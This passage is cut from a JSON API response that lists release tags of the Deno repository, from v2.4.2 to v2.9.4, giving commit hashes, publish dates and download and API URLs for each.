commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v